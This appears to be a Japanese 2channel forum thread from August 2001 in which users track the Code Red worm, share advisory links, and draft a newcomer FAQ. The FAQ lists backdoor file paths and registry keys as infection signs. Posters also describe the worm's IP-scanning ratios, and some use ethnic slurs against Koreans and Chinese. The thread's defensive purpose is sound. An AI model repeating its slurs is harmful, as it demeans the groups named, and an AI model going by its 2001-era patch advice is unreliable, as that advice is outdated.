   ( ・∀・)          (´∀` ) < そのわりに無駄な処理かましてるけどな。
   ( つ  )つ□   □ ⊂(    )  |
  ┃レ __   | ̄ ̄ ̄ ̄ |  .___ノ┃  \__________
  ┗━┳┳\ | ̄ ̄ ̄ ̄| ./━┳┳┛
     ┃┃  |_____|    .┃┃  

814 :名無しさん@お腹いっぱい。:2001/08/08(水) 20:27
>>813
オメーがムダダ

815 :名無しさん@お腹いっぱい。:2001/08/08(水) 20:32

  Λ_Λ   / ̄ ̄ ̄ ̄ ̄
 ( ´∀`) <  オマエモナー
 (    )   \_____
 | | |
 (__)_)

816 :名無しさん@お腹いっぱい。:2001/08/08(水) 20:35

 彡ミ  | |  ∧_∧|__
  |ヽ  | | ( ´ー`/  / まったく、厨房には困ったものだな。
  |ヽ  | | (   ,/_〇
  ⊥  |  ̄| ̄|| ̄ ̄ ̄ ̄ ̄|
  |__|   ◎ ̄| ̄| ̄ ̄ ̄ ̄ ̄|

 彡ミ  | |  ∧_∧|__
  |ヽ  | | ( ´ー` /  / そう思わんか?
  |ヽ  | | (   ,/_〇
  ⊥  |  ̄| ̄|| ̄ ̄ ̄ ̄ ̄|
  |__|   ◎ ̄| ̄| ̄ ̄ ̄ ̄ ̄|

817 :名無しさん@お腹いっぱい。:2001/08/08(水) 20:38
アンケートに答えて「素敵なマイクロソフトオリジナルグッズ」をもらおう!
http://smb.microsoft.co.jp/technet/feedback/form.asp

818 :名無しさん@お腹いっぱい。:2001/08/08(水) 20:44
そろそろ次のスレタイトルでも考えようか。
「コードレッド (Code Red) 赤丸が世界を覆う」
なんてどう?
赤虫もタイトルに入れたいところだけど。

819 :名無しさん@お腹いっぱい。:2001/08/08(水) 20:47
>>818
赤虫→赤厨 ってのどう?

820 :名無しさん@お腹いっぱい。:2001/08/08(水) 20:48
>>818 >>819
漏れ的には爆心地イメージがあるんで818がいいっす。

821 :名無しさん@お腹いっぱい。:2001/08/08(水) 20:48
イントラのPCが感染しまくりで大騒ぎ。
firewallは立てているのに。
どーやって入り込んだのかなぁ。。。

822 :名無しさん@お腹いっぱい。:2001/08/08(水) 20:50
>>821
(1) 勝手なダイアルアップサーバが立っていた (怒
(2) DMZがDMZになってなかった(藁

823 :名無しさん@お腹いっぱい。:2001/08/08(水) 20:54
>>818-820
1 に書く文面とリンク先も考えよう

824 :名無しさん@お腹いっぱい。:2001/08/08(水) 20:58
新スレ立てる方へ

Win2kProってデフォルトじゃIISはインストールされないでしょ? 素人はサービス追加したり弄ったりしないだろうからまず大丈夫。
コンピュータの管理>サービスとアプリケーション>サービス>インデックスサービスが停止してれば問題なし。
これは間違い。インデックスサービスを潔く削除

この文入れてください。

825 :名無しさん@お腹いっぱい。:2001/08/08(水) 21:02
インデックスサービスの削除じゃなくて.idq .ida
のスクリプトマッピングの解除じゃかったっけ?

826 :名無しさん@お腹いっぱい。:2001/08/08(水) 21:02
>>824
それは書かないほうがいい事だと思う。

827 :名無しさん@お腹いっぱい。:2001/08/08(水) 21:02
>>823
これ入れない?
>>691

828 :名無しさん@お腹いっぱい。:2001/08/08(水) 21:03
ニフティーはユーザー多いだけあって
アタックログも多い。

会員に注意喚起するメールを送るべき
だと思うんだけどみんなはどう思う?

829 :名無しさん@お腹いっぱい。:2001/08/08(水) 21:03
>>824
Windows 2000 Professionalユーザが認識すべきこと

>Win2kProってデフォルトじゃIISはインストールされないでしょ?
>素人はサービス追加したり弄ったりしないだろうからまず大丈夫。
>コンピュータの管理>サービスとアプリケーション>サービス>インデックスサービスが停止してれば問題なし。

これは間違い。"インデックスサービスを潔く削除"すること。
(ここに削除の方法)

---
こんなのはどうでしょうか。

830 :名無しさん@お腹いっぱい。:2001/08/08(水) 21:06
>>828
 ニフティって広告メールは沢山寄越すくせに
 そういうメールは寄越さないんだよね〜

831 :名無しさん@お腹いっぱい。:2001/08/08(水) 21:07
>>428 も入れておきたいところだね。

832 :820:2001/08/08(水) 21:08
>>823

ひとまずえいやーで国内サイトの更新。

マイクロソフト、Code Red対策で24時間電話問い合わせ窓口
http://biztech.nikkeibp.co.jp/wcs/show/leaf?CID=onair/biztech/msn/137249
MSによる防護策・駆除方法の説明
http://www.microsoft.com/japan/technet/security/codeptch.asp
逝っちゃってるプロバイダ情報
http://watch.impress.co.jp/broadband/news/2001/08/06/codered.htm
hash's Security Alert 2001-02
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html
カンコックでは官公庁が感染
http://news.yahoo.co.jp/headlines/reu/010807/int/18345001_japan_47407_1.html
IISから、Apache for win32 にアップグレード (藁
http://www.ring.gr.jp/pub/net/apache/docs/windows.html

833 :名無しさん@お腹いっぱい。:2001/08/08(水) 21:10
ところで、インデックスサービスを削除すると本当にidq.dllは消えるの?

834 :名無しさん@お腹いっぱい。:2001/08/08(水) 21:10
>>829
いちおう、MSサイトにでた駆除方法に画像入りで載ってました。
「予防方法としても有効」と注釈すればィィ!かと。

835 :832=834:2001/08/08(水) 21:11
>>833
消えないので、832からMSのサイト見てください。そのページにある。

836 :名無しさん@お腹いっぱい。:2001/08/08(水) 21:12
俺もニフなんだけどニフユーザーからのちょっかい多過ぎ。
シナとコリアとニフばっか。ニフは61が多いからかなぁ。

837 :名無しさん@お腹いっぱい。:2001/08/08(水) 21:12
ところで…
しみじみ語っていいですか…

このスレ、というかコードレッド騒ぎも、バックドア侵入が主題となってきましたね…
わが社にもきているパケットも殆ど「XXXXXXX…」です。わが社のサーバー(Linux)は、
今のところ安定して稼動しています…

…ところで私、前スレで「しみじみ語った…」ものですが、前スレの>>14でもありま
す。その節はつい過熱した書き込みをしてしまい、失礼いたしました。あのころの方々
は、皆さんお元気でしょうか?今となっては、良い思い出です。

それではまだまだゴミパケットはネット上をかけめぐり続けるでしょうが(このパケッ
トがゼロになるのはいつの日でしょうか…忘れた頃にネット上に解き放すと、受けそう
ですね…)、皆さんお体を大切に、さようなら…

838 :名無しさん@お腹いっぱい。:2001/08/08(水) 21:12
これまで入れるとやりすぎ?
http://japan.cnet.com/News/1999/Item/990716-1.html?mn

839 :なー:2001/08/08(水) 21:19
ぐえ。スレ2本目ももう800台かい。
昨日立ったんだよな。早いねえ。そろそろネタも尽きただろうに。

840 :名無しさん@お腹いっぱい。:2001/08/08(水) 21:19
>>837 練習が足りません。3点。

841 :いっと関連企業:2001/08/08(水) 21:20
ありがとう。夏のボーナスが出せます。

842 :名無しさん@お腹いっぱい。:2001/08/08(水) 21:20
>>837
しみじみ君が前スレの14だったか・・・
そういわれてみればそんな感じだね。
まあしみじみ君も体に気をつけ、仕事に励んでくれ

843 :age:2001/08/08(水) 21:22
age

844 :名無しさん@お腹いっぱい。:2001/08/08(水) 21:23
>>837

あのときついわれを忘れて、涙と汗と(藁 を流したことをよく覚えているであります。

昨晩も、熱い体験を求めてやってまいりましたが、目の当たりにしたのは、その場に
いるだけでやばそーな劣情アタックの実況中継・・・

さて、御社とゆーかみなさんに届くパケットが「XXXXX・・・」ばかりでなく「YYYYY・・・・」
「ZZZZZ・・・」「萌え萌え萌え萌え・・・」ばかりになったり「はっきりいって、これからは
インターネットはこういうものにな」ったりもせず、暮らしやすいインターネットが戻る日を
切に願うで有ります。

では、お体をお大切に・・・

845 :名無しさん@お腹いっぱい。:2001/08/08(水) 21:26
>>823
忘れてたが、傑作のコレは?(本人の了解はとってない)
http://www.oresama.org/default.ida

846 :スクリプトキティ:2001/08/08(水) 21:28
>844
遣っちゃおうかな。。。。(#゚Д゚)(#゚Д゚)(#゚Д゚)

847 :名無しさん@お腹いっぱい。:2001/08/08(水) 21:30
ええと、
http://www.microsoft.com/japan/technet/security/codeptch.asp
によると、個人の Win2kPro ユーザーでも Office XP の SharepPoint
とか FrontPage とかのユーザーは気がつかないうちに IIS を動かしてる
かもしれないので、次の 1 に書く案内には

  個人ユーザーで Windows NT/2000 を使っている人も、念のため次の
  確認をしましょう

  ・Ctrl-Alt-Del を押して「タスク マネージャ」を起動
  ・「プロセス」タブを押す
  ・Inetinfo.exe プロセスを探す

  Inetinfo.exe があった人は、インデックスサービスの使用有無に
  *かかわらず* 以下の確認をしましょう

  (チェック項目貼り付け)

という感じにしませんか?

848 :名無しさん@お腹いっぱい。:2001/08/08(水) 21:32
あっと、>>847さんに同意、
自分も書いたので一応
●Win2000/NTのユーザーさんへ、
 IISなんか使ってないから平気だよ、と思ってますね。
 本人の知らないうちにIISが稼働している事があるようです。

タスクマネージャのプロセスにInetinfo.exe
が存在してたらIISが稼働中です。

また、
 c:\explorer.exe
 d:\explorer.exe
 c:\inetpub\scripts\root.exe
 c:\Program Files\Common Files\System\MSADC\root.exe
 が存在、あるいは、
 SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\VirtualRoots\Scripts
 SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\VirtualRoots\msadc
 SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\VirtualRoots\c
 SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\VirtualRoots\d
 のレジストリキーが存在していれば感染してます。

 なんらかの事情がありパッチを当てられない場合には

 http://www.microsoft.com/japan/technet/security/codeptch.asp#counterofothers
 に従い、
 .idq、.idaのidq.dlへのアプリケーションマッピングの削除を行いましょう

849 :名無しさん@お腹いっぱい。:2001/08/08(水) 21:35
>>848
バックドアあけられているからそれじゃ駄目だろう。
とりあえずIIS止めないことには何も始まらない。

850 :名無しさん@お腹いっぱい。:2001/08/08(水) 21:36
>>847

そうですね。
詳細は、比較的正確に書かれたサイトの情報(JPCERT, MS)に絞り、書かないほうが
混乱しないかも。

思い込み勝ちな誤りのみ、注意点を書けばいいんじゃないかな
・default.ida消してもダメ!
・MSの復旧策、個人レベルではともかく、裏口から色々やられて痕跡破壊されたらとき
には十分なポリシーじゃなく、本格的にサーバ立ててるなら徹底検証か再インストっ
てことなど

851 :847:2001/08/08(水) 21:42
>>848-850 さんきゅです。

思い込みがちな誤りに追加したいっす
・インデックスサービスは停止していても感染します。

長くすると一覧のとき表示されないので、1 に注意点の要約、2 に重要リンク
3 にその他の情報リンクと分けたほうがいいかも。

852 :名無しさん@お腹いっぱい。:2001/08/08(水) 21:45
とりあえずIISを走らせてないと思っていても動いてる場合が
あるというのは1に入れておきたいかな。

853 :うげ:2001/08/08(水) 22:02
がいしゅつだったら、スマソ。対象製品などのリスト
http://www.microsoft.com/japan/technet/security/codeptch.asp

こういうのはやくだせ、ゴラァ>M$

854 :アパチ萌え:2001/08/08(水) 22:03
そういえば、「アパッチ健」って最近どうしてるん?

855 :名無しさん@お腹いっぱい。:2001/08/08(水) 22:05
フレッツISDNでつないでて、さっきまでIPが61で始まってたんだけど
その時は61から始まるIPのアクセスが集中してた。
一旦切断して211から始まるIPに変わったら今度は211のIPからのアクセスが集中。

ふ〜ん。そうゆう関係だったのか。

856 :名無しさん@お腹いっぱい。:2001/08/08(水) 22:08
>>855
プロバイダの運用管理者、だからロクに気づかないとかいう可能性も・・・

857 :ななしさん:2001/08/08(水) 22:10
さすがは、自称インターネット先進国!!
http://www.security.nl/misc/codered-stats/geodist.gif
↓ その中心は....
http://jove.prohosting.com/~wingtxt/source/nakasu121.jpg
謝罪と賠償を....

858 :名無しさん@お腹いっぱい。:2001/08/08(水) 22:10
>>855
こっちなんか同じプロバから1日で30回くらいノックされてるよ

859 :名無しさん@お腹いっぱい。:2001/08/08(水) 22:11
http://www.security.nl/misc/codered-stats/
収束しないなぁ。見事に24hごとの波があるのがワラエル。

860 :名無しさん@お腹いっぱい。:2001/08/08(水) 22:12
>>857
もうちょっとで日本全部飲み込む・・・(´Д`;)

861 :名無しさん@お腹いっぱい。:2001/08/08(水) 22:14
>>858
@nifty(infoweb)、昼は根絶してたが、夜になって(ワームが)復活してきた。
再感染するPPP野郎、多数とみられ。

862 :名無しさん@お腹いっぱい。:2001/08/08(水) 22:18
>>857
 何げに米、EUも広がってきてるね。

863 :名無しさん@お腹いっぱい。:2001/08/08(水) 22:19
東北大学から飛んできたよ?
203.252.165.233
203.253.21.139 逝ってる
203.144.224.242 逝ってる
203.155.53.246 宗教か?テクノロジー?haha
203.239.63.7   24連発
203.232.131.14 have a good time が笑える

864 :名無しさん@お腹いっぱい。:2001/08/08(水) 22:23
他の板でも警告スレ立てた方がいいんじゃない?

865 :855:2001/08/08(水) 22:23
211で始まるIP、カンコックばっかりでつまんない。
おれも203になりて〜。
もう一回切断&再接続でIP変えようっと。

866 :855:2001/08/08(水) 22:28
ダメだ。
ウチのプロバって61と211しかないみたい。
しょうがないから61で我慢するか・・・

867 :名無しさん@お腹いっぱい。:2001/08/08(水) 22:29
ウチは61しか割り当てられない。つまんない。

868 :名無しさん@お腹いっぱい。:2001/08/08(水) 22:32
俺のところは210だけど、211とか65なんかが来たことあるよ。
これってNNNかな?

869 :名無しさん@お腹いっぱい。:2001/08/08(水) 22:32
61はHINETがウザイ

870 :名無しさん@お腹いっぱい。:2001/08/08(水) 22:34
>>>868
 coderedIIは
2分の1の確率でスレッドは最初の1バイトが感染ホストと同じIPアドレスをランダムにスキャンする。

8分の3の確率でスレッドは最初の2バイトが感染ホストと同じIPアドレスをランダムにスキャンする。
8分の1の確率でスレッドはランダムなIPアドレスをスキャンする。

871 :855:2001/08/08(水) 22:35
>>868
あ、ホントだ。
昔のアクセスログのNNN系はランダムなIPだった。

872 :名無しさん@お腹いっぱい。:2001/08/08(水) 22:38
なんかパチンコの当たり振り分けみたいだな(笑)

873 :名無しさん@お腹いっぱい。:2001/08/08(水) 22:49
うち210。やけに*.*.ethome.net.twが多い。台湾、韓国の
大学とかも結構あるけど、大学ってどこもこんなもんかね

874 :名無しさん@お腹いっぱい。:2001/08/08(水) 22:52
61.*.*.*はつまらんとこが多い。
日本からはODNの自家鯖が殆ど。

875 :次スレの1練習:2001/08/08(水) 22:53
     [ 添削キボンヌ ]
( ´Д`)/ 先生! よくわからないけど不安です

1. 使ってるOSは Windows NT4.0/2000ですか?
   NT4.0 → 2.
   2000 (Server だけじゃなくて Professional 含む) → 3.
   どちらでもない → ヨカッタネ
2. http://www.microsoft.com/japan/technet/security/codeptch.asp#counterofnt4
  を見てすぐに対処しよう
3. http://www.microsoft.com/japan/technet/security/codeptch.asp#counterofw2k
  を見てすぐに対処しよう


( ´Д`)/ 先生! 感染しちゃったみたいです。

すぐに IIS を停止しよう。それから
http://www.microsoft.com/japan/technet/security/codeptch.asp#extermination
を見て駆除しましょう。でも、すでに他のバックドア(裏口)を作られ
ちゃってるかもしれないので、なるべくなら OS の再インストール
を。くれぐれも再インストール中に感染しないように注意。

詳しくは、>>2 のリンク先をドウゾ

876 :名無しさん@お腹いっぱい。:2001/08/08(水) 22:54
スレタイトルは?

877 :びびった:2001/08/08(水) 22:55
ME+PWSなんていうヘタレでサーバの真似事をしてみました。
2分に1回の割りで、Code Red IIのアッタクがありました。
まあ、IISじゃないから感染はしてないはずだけど、びびりました。
PWS即停止です。

878 :名無しさん@お腹いっぱい。:2001/08/08(水) 22:58
>>875 感染チェックのページも載せたほうがよいと思う。

879 :875:2001/08/08(水) 22:58
>>876 タイトルは >>818 で良いかと。

すまぬ。これから出なきゃいけなくなったので 900超えたら誰か
次立ててください。

880 :名無しさん@お腹いっぱい。:2001/08/08(水) 22:58
夜遊びはほどほどにな

881 :名無しさん@お腹いっぱい。:2001/08/08(水) 22:59
>>876
私にも感染せます

882 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:02
そこはかとなくおっさんの香りが・・・

883 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:05
W2Kproはsp2をあててればいいの?

884 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:06
>>881
私にも感染るんです・・・か?

885 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:07
>>883
さらにパッチ必要。すぐ上で参照されてるMSのページ全部よめ。

886 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:09
>>884
 パパ、撮って?

887 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:10
タスクマネージャ呼び出しはCTRL+ALT+DELETEからよりも
Ctrl+Shift+ESC の方が良くない?

888 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:10
なんでMSはそのまえのsadmindやCode Red IでWindows Update出さなかったのか。。。
#過去形じゃないなもう。

889 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:11
「赤虫(code red)赤丸が彼の国を覆う」なんてどう?

890 :888:2001/08/08(水) 23:11
888

891 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:11
>>887
またひとつ、賢くなった (藁

892 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:12
原案どおり、世界覆っとくほうが志は高いだろう(なんでだ)。>>889

893 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:13
>>884
みっちゃんのママ募集中。

894 :え〜ん:2001/08/08(水) 23:16
おいおいもう次のスレ準備かYO

895 :なー:2001/08/08(水) 23:19
ほれ。各国のIP割り当て。IPv4な。
http://www.apnic.net/maps/tld-list.html

日本
http://cgi.apnic.net/apnic-bin/ipv4-by-country.pl?country=jp
韓国
http://cgi.apnic.net/apnic-bin/ipv4-by-country.pl?country=kr
中国
http://cgi.apnic.net/apnic-bin/ipv4-by-country.pl?country=cn

896 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:19
「fuck USA Goverment」を見てしまった・・・。

897 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:21
懐かしいな

898 :355:2001/08/08(水) 23:22
やっぱりみんなさすがにカッコ悪いと思うせいか、実名を晒す奴はいないな(藁

899 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:23
http://people.site.ne.jp/2001/2001.html
すごいペースだな

900 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:25
(´д`)900

901 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:25
>>895
Code Red とはぜんぜん関係ないんであれだけどさ、
SINET につながってる 130 とか 133 とかは
>>895のところでは出てこないんだよね。
これってどこが管理してるの?

902 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:27
さて、新スレよろしく
>>900

903 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:28
>>901
Class Aで日本だと思うが。895には、Class Bしか載ってないと思われ。

904 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:28
>>900
よろしーく

905 :え〜ん:2001/08/08(水) 23:30
>>900
がんばってください。

906 :え〜ん:2001/08/08(水) 23:35
あ〜もうアクセスログ見るのもうんざり

907 :新スレに貼り付けて:2001/08/08(水) 23:37
IISから、Apache for win32 にアップグレード

ダウンロードはここから
http://www.ring.gr.jp/pub/net/apache/dist/httpd/binaries/win32/apache_1.3.20-win32-no_src-r2.msi
使い方はここをみろ
http://www.ring.gr.jp/pub/net/apache/docs/windows.html

908 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:37
うぅ、新スレ立たないと寝れん

909 :名無しさん:2001/08/08(水) 23:40
おいおい、はやくたてろや

910 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:41
まぁまぁ

911 :え〜ん:2001/08/08(水) 23:41
今ブラウザで久々に2CH見たけどこんなに重いの?

912 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:41
急に振られた900が大変かと思われ。

913 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:41
はいはいもうちゅぐですからね〜

914 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:42
ばぶばぶ

915 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:44
さっきからリロード連発。
トンだらゴメソ

916 :なー:2001/08/08(水) 23:44
900過ぎるとだれるなぁ。

917 :なー:2001/08/08(水) 23:44
>>915
氏んでください。

918 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:44

    ∧ ∧___
   /(*゚ー゚) /\
 /| ̄∪∪ ̄|\/
   |        |/
     ̄ ̄ ̄ ̄

919 :900:2001/08/08(水) 23:45
新スレ案
猛威を振るっている Code Red とその亜種 (自称 Code Red II など)
についての情報を追いましょう。
●前スレ コードレッド (Code Red) 逝ってヨシ
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997150588

( ´Д`)/ 先生! よくわからないけど不安です

1. 使ってるOSは Windows NT4.0/2000ですか?
   NT4.0 → 2.
   2000 (Server だけじゃなくて Professional 含む) → 3.
   どちらでもない → ヨカッタネ
2. http://www.microsoft.com/japan/technet/security/codeptch.asp#counterofnt4
  を見てすぐに対処しよう
3. http://www.microsoft.com/japan/technet/security/codeptch.asp#counterofw2k
  を見てすぐに対処しよう


( ´Д`)/ 先生! 感染しちゃったみたいです。

すぐに IIS を停止しよう。それから
http://www.microsoft.com/japan/technet/security/codeptch.asp#extermination
を見て駆除しましょう。でも、すでに他のバックドア(裏口)を作られ
ちゃってるかもしれないので、なるべくなら OS の再インストール
を。くれぐれも再インストール中に感染しないように注意。

重要リンク>>2)
そのたの情報>>3
感染の確認>>4-5

920 :900:2001/08/08(水) 23:45
スレ2
IPA による CodeRed II 注意喚起 (日本語)
http://www.ipa.go.jp/security/ciadr/vul/20010727codered.html
JPCERT/CC による Code Red II 注意喚起 (日本語)
http://www.jpcert.or.jp/at/2001/at010019.txt
CERT Advisory 2001-23 和訳
http://www.reasoning.org/jp/cert/incident_notes/in-2001-09-j.html

マイクロソフト、Code Red対策で24時間電話問い合わせ窓口
http://biztech.nikkeibp.co.jp/wcs/show/leaf?CID=onair/biztech/msn/137249
MSによる防護策・駆除方法の説明
http://www.microsoft.com/japan/technet/security/codeptch.asp
逝っちゃってるプロバイダ情報
http://watch.impress.co.jp/broadband/news/2001/08/06/codered.htm
hash's Security Alert 2001-02
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html
カンコックでは官公庁が感染
http://news.yahoo.co.jp/headlines/reu/010807/int/18345001_japan_47407_1.html
IISから、Apache for win32 にアップグレード (藁
http://www.ring.gr.jp/pub/net/apache/docs/windows.html

921 :900:2001/08/08(水) 23:46
スレ3
Code Red II 情報(英語) : 解析情報へのリンクあり
http://www.incidents.org/react/code_redII.php

Code Red II の警告と解析レポート (英語PDF)
http://aris.securityfocus.com/alerts/codered2/

CodeRed Scanner (英語) : CodeRed 感染の可能性があるホストをスキャン
http://www.eeye.com/html/Research/Tools/codered.html

ヤマハ RT80i, RT50i の脆弱性
http://www.rtpro.yamaha.co.jp/RT/FAQ/TCPIP/www-server-vulnerability.html

古川電工 MUCHO-E シリーズが受ける影響
http://www.humind.or.jp/~higasino/ML/infusers/2001-Aug/msg00003.html

崩壊させられているプロバイダ INTERLINK の障害情報
http://www.interlink.or.jp/notification/backno/2001/trb029.html

東アジア壊滅の図
http://www.security.nl/misc/codered-stats/

Code Red騒ぎでCode Redソーダが絶好調 (日本語)
http://www.zdnet.co.jp/news/0108/04/b_0803_11.html

●IISから、Apache for win32 にアップグレード

ダウンロードはここから
http://www.ring.gr.jp/pub/net/apache/dist/httpd/binaries/win32/apache_1.3.20-win32-no_src-r2.msi
使い方はここをみろ
http://www.ring.gr.jp/pub/net/apache/docs/windows.html

922 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:46
>>915
2番は取らなくていいんだぞ

923 :900:2001/08/08(水) 23:46
スレ4
タスクマネージャのプロセスにInetinfo.exe
が存在してたらIISが稼働中です。

また、
 c:\explorer.exe
 d:\explorer.exe
 c:\inetpub\scripts\root.exe
 c:\Program Files\Common Files\System\MSADC\root.exe
 が存在、あるいは、
 SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\VirtualRoots\Scripts
 SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\VirtualRoots\msadc
 SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\VirtualRoots\c
 SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\VirtualRoots\d
 のレジストリキーが存在していれば感染してます。

924 :900:2001/08/08(水) 23:46
スレ5
 なんらかの事情がありパッチを当てられない場合には

 http://www.microsoft.com/japan/technet/security/codeptch.asp#counterofothers
 に従い、
 .idq、.idaのidq.dlへのアプリケーションマッピングの削除を行いましょう

  個人ユーザーで Windows NT/2000 を使っている人も、念のため次の
  確認をしましょう

  ・Ctrl-Alt-Del を押して「タスク マネージャ」を起動
  ・「プロセス」タブを押す
  ・Inetinfo.exe プロセスを探す

  Inetinfo.exe があった人は、インデックスサービスの使用有無に
  *かかわらず* 以下の確認をしましょう

925 :なー:2001/08/08(水) 23:46
>>901
どことは?
130.in-addr.arpa.とかで判らんか?

926 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:47
900はがんばりました○

927 :なー:2001/08/08(水) 23:47
>>900
例の「default.ida?XXXXXXXXXXXXX〜」も書いておけ。

928 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:48
   @ノハ@
   ( ‘д‘)つ   あいぼんやでぇ!
 (( (⊃  (⌒) ))
    (__ノ

    @ノハ@    かかってこいやゴルァ!
    (‘д‘ )__ ♪
 (( ⊂⊂   _)
     (__ノ ̄ 彡

   @ノハ@    オラオラオラオラー!!
   (‘д‘ ∩ ))
 ((  (⊃ 丿
    (__)し'

929 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:50
>>900
お〜いちゃんと立ててるか〜

930 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:50
>>900
ご苦労様です。がんばってね。

本日もポート80祭りでございました。
111も、ちらほらあったけど。そろそろ寝るわ・・・。

931 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:51
>>923-924は内容が重複してるから
適当にまぜて一つにした方がいいかな。

932 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:51
900の書いた内容で問題ないよね?

933 :900:2001/08/08(水) 23:52
>>927
どこ〜?

934 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:52
>>928
ここはモー板ではありません!
でもオモシロイ

935 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:52
もしかして立て方知らない人でパニクテルとか・・まさか

936 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:52
パッチを当てたらインデックスサービス以下にいろいろ追加されたんですけど、これはほっといていいんですよね

937 :なー:2001/08/08(水) 23:53
まー立てても2日持つまい。
あと新タイトル長すぎ。

938 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:53
…ところでさ、「…24時間電話問い合わせ窓口」って、とうぜんオペの女性なりが
出てくるわけだよね、2Ch的に逝ってそれって…ハアハア

939 :900:2001/08/08(水) 23:53
>>927もしかして>>81?
これでいいんかい?立てるよ?

940 :なー:2001/08/08(水) 23:53
>>933
うーん。前の板の>>300-600あたり。

941 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:54
もぅ、みんなの意見なんぞ聞かずに
立ててしまえ〜〜〜〜

942 :なー:2001/08/08(水) 23:54
>>900
もういい。任せる。

943 :なー:2001/08/08(水) 23:55
>>900
いいから気にせず立てろ。
寝られないだろ。

944 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:55
勃てれ〜

945 :名無しさん@酒飲みすぎ〜:2001/08/08(水) 23:57
早く〜
もう寝るよ〜

946 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:57
900は今がんばってます。
少々お待ちを・・・

947 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:58
立つまでまて!
お疲れ様ぐらいいってからねれ

948 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:58
>>928
これは、有名なアパッシュダンスか?

949 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:59
ま〜こまったでちゅね〜もうちょっとでちゅよ〜

950 :名無しさん@お腹いっぱい。:2001/08/08(水) 23:59
セキュリティ板の全員がこのスレに集中してるだろ。
他のスレ誰も相手してくれなくて寂しいぞ

951 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:00
>>901
どっかで聞いた事あるが、割り当て時期がJUNETの
時代だからね。1980年代の終わり。きちんとした
割り当てが行われる以前の話だよ。

952 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:00
900踏まなくて良かったと思ってる奴の数->(???)

953 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:01
0:01

954 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:02
0:02

955 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:02
ここが1000超える前に立つよね?

956 :952:2001/08/09(木) 00:03
そういえばうちの大学Class Bを二つ持っている。
昔は気前よくClass Bが貰えたらしい。

957 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:03
0:03

958 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:03
立ったよ

959 :956:2001/08/09(木) 00:03
>>951の間違い。

960 :なー:2001/08/09(木) 00:05
0時すぎたー。寝る。

961 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:06
お疲れ様でした〜〜

962 :なー:2001/08/09(木) 00:06
新スレ。コードレッド (Code Red) 赤丸が世界を覆う
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899&ls=50

963 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:08
>>900
お疲れ様
2踏みたがる奴多いんだな...

964 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:12
新スレも立ったことだし、ラーメンでも喰い行こ。

965 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:12
新スレ
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997283377&ls=50

966 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:13
新スレ
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997283377&ls=50

967 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:15
新スレ。コードレッド (Code Red) 赤丸が世界を覆う
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899&ls=50

968 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:16
うちはファイアーウォールでhttpボートをステルスにしているせいか、
一度もアタックらしきものはないんですが、大丈夫ってことですよね?

969 :900:2001/08/09(木) 00:21
コードレッド (Code Red) 赤丸が世界を覆う
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997283377
が次スレです。

